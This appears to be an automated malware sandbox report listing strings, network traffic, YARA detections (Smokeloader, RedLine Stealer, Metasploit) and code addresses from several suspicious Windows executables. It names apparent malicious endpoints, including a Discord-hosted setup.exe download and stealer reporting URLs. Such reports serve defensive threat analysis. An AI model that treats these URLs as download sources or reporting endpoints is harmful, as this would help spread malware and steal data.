Source: hI6pMK6rYY2urO_lpGyU85DA.exe, 00000007.00000003.1572629914.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, hI6pMK6rYY2urO_lpGyU85DA.exe, 00000007.00000003.1587610572.0000000002178000.00000004.00001000.00020000.00000000.sdmp, hI6pMK6rYY2urO_lpGyU85DA.tmp, hI6pMK6rYY2urO_lpGyU85DA.tmp, 0000000B.00000000.1595851953.0000000000401000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.remobjects.com/ps
Source: hI6pMK6rYY2urO_lpGyU85DA.exe, 00000007.00000003.1572629914.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, hI6pMK6rYY2urO_lpGyU85DA.exe, 00000007.00000003.1587610572.0000000002178000.00000004.00001000.00020000.00000000.sdmp, hI6pMK6rYY2urO_lpGyU85DA.tmp, 0000000B.00000000.1595851953.0000000000401000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.remobjects.com/psU
Source: file.exe, 00000000.00000002.1417872247.0000000004025000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.1687419354.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1762556798.0000000000CAA000.00000002.00000001.01000000.0000000A.sdmp, CheckTool[1].exe.3.dr String found in binary or memory: https://api.midtrans.comGetUserDefaultLocaleNameinvalid
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1762556798.0000000000CAA000.00000002.00000001.01000000.0000000A.sdmp, CheckTool[1].exe.3.dr String found in binary or memory: https://api.sandbox.midtrans.comcrypto/aes:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=json
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=jsonb
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org:443/?format=json
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/6
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1274634716451967060/1289665540448583732/setup.exe?ex=66f9a621
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachmtachm
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053622076.0000000002C0F000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052522216.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052810858.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053688783.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://g-cleanit.hk
Source: IZImiIFXXrvtVOHFozZW.dll.6.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: BitLockerToGo.exe, 00000032.00000002.1779130970.0000000002692000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ghostreedmnu.shop/
Source: BitLockerToGo.exe, 00000032.00000002.1779130970.00000000026B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000003.1768755104.00000000026B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ghostreedmnu.shop/api
Source: BitLockerToGo.exe, 00000032.00000002.1779130970.0000000002692000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ghostreedmnu.shop/m
Source: RegAsm.exe String found in binary or memory: https://ipgeolocation.io/
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/(
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/R)dn
Source: file.exe, 00000000.00000002.1417872247.0000000004025000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1687419354.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33Z
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co/
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co/%M
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co/1S3fd7
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co/1S3fd7&
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co/p
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co:443/1S3fd7S
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053622076.0000000002C0F000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052522216.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052810858.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053688783.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1Pz8p7
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000000.1571265793.00000000013E2000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://serviceupdate32.com/update
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: https://www.certum.pl/CPS0
Source: BitLockerToGo.exe, 00000032.00000003.1768734098.000000000270A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000002.1779130970.0000000002692000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000003.1768755104.00000000026B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000032.00000003.1768734098.000000000270A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000003.1768755104.00000000026B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49726 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match File source: Process Memory Space: Install.exe PID: 8132, type: MEMORYSTR

System Summary

Source: 00000009.00000002.2102908522.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000009.00000002.2102510892.00000000004AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.1766538879.000000000198E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000A.00000002.1766830141.0000000001B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: file.exe, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 1947136
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File dump: service123.exe.6.dr 314617856 Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042CC00 __aulldiv,VirtualAlloc,__aulldiv,__aulldiv,NtQuerySystemInformation,__aulldiv,WideCharToMultiByte,CharToOemA,VirtualFree,__aulldiv, 3_2_0042CC00
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0042F530 NtdllDefWindowProc_A, 11_2_0042F530
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00423B94 NtdllDefWindowProc_A, 11_2_00423B94
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004125E8 NtdllDefWindowProc_A, 11_2_004125E8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004789DC NtdllDefWindowProc_A, 11_2_004789DC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 11_2_004573CC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 11_2_0042E944
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 7_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 11_2_004555D0
Source: C:\Windows\SysWOW64\schtasks.exe File created: C:\Windows\Tasks\bMvfdBTccYfZYKRCwN.job
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00427140 3_2_00427140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00436570 3_2_00436570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042C520 3_2_0042C520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004305F0 3_2_004305F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0046D580 3_2_0046D580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00431690 3_2_00431690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004516A0 3_2_004516A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00442810 3_2_00442810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004379C0 3_2_004379C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004349D0 3_2_004349D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00433A90 3_2_00433A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00434BF0 3_2_00434BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00509CE0 3_2_00509CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00440DC0 3_2_00440DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004CEF10 3_2_004CEF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004210E0 3_2_004210E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00402100 3_2_00402100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004241E0 3_2_004241E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00441320 3_2_00441320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004213A0 3_2_004213A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004233A0 3_2_004233A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042D420 3_2_0042D420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042A510 3_2_0042A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040B5E0 3_2_0040B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004435F0 3_2_004435F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00422580 3_2_00422580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00405640 3_2_00405640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00424660 3_2_00424660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00517635 3_2_00517635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00402630 3_2_00402630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_005636CC 3_2_005636CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0054E6CA 3_2_0054E6CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00513840 3_2_00513840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00544809 3_2_00544809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00517830 3_2_00517830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00421820 3_2_00421820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0057B914 3_2_0057B914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041E9E0 3_2_0041E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0044AA40 3_2_0044AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00562AB0 3_2_00562AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00425BD0 3_2_00425BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042DBD0 3_2_0042DBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042CC00 3_2_0042CC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00543E60 3_2_00543E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00552ED0 3_2_00552ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00550E98 3_2_00550E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00401E90 3_2_00401E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00567FBD 3_2_00567FBD
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_0040840C 7_2_0040840C
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_004162A6 8_2_004162A6
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_0040E5A5 8_2_0040E5A5
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_004126B0 8_2_004126B0
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00403A01 8_2_00403A01
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00418EF1 8_2_00418EF1
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00418FCB 8_2_00418FCB
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00408A70 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00402C60 9_2_00402C60
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004248CD 9_2_004248CD
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004120D3 9_2_004120D3
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004249ED 9_2_004249ED
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00422AC7 9_2_00422AC7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00412305 9_2_00412305
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004154F0 9_2_004154F0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00420533 9_2_00420533
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0040E580 9_2_0040E580
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041C599 9_2_0041C599
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041BE73 9_2_0041BE73
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_1000E184 9_2_1000E184
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_100102A0 9_2_100102A0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020D233A 9_2_020D233A
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020E4B34 9_2_020E4B34
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DC0DA 9_2_020DC0DA
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C5E13 9_2_020C5E13
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020D5757 9_2_020D5757
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C5F7B 9_2_020C5F7B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020E079A 9_2_020E079A
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020CE7E7 9_2_020CE7E7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020E4C54 9_2_020E4C54
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C8CD7 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020D256C 9_2_020D256C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004804C6 11_2_004804C6
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00470950 11_2_00470950
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004352D8 11_2_004352D8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00467710 11_2_00467710
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0043036C 11_2_0043036C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004444D8 11_2_004444D8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004345D4 11_2_004345D4
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00486604 11_2_00486604
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00444A80 11_2_00444A80
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00430EF8 11_2_00430EF8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00445178 11_2_00445178
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045F430 11_2_0045F430
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045B4D8 11_2_0045B4D8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00487564 11_2_00487564
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00445584 11_2_00445584
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00469770 11_2_00469770
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0048D8C4 11_2_0048D8C4
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004519A8 11_2_004519A8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0043DD60 11_2_0043DD60
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: String function: 020CD9F7 appears 39 times
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: String function: 0040D790 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004172E0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0053F9A0 appears 39 times
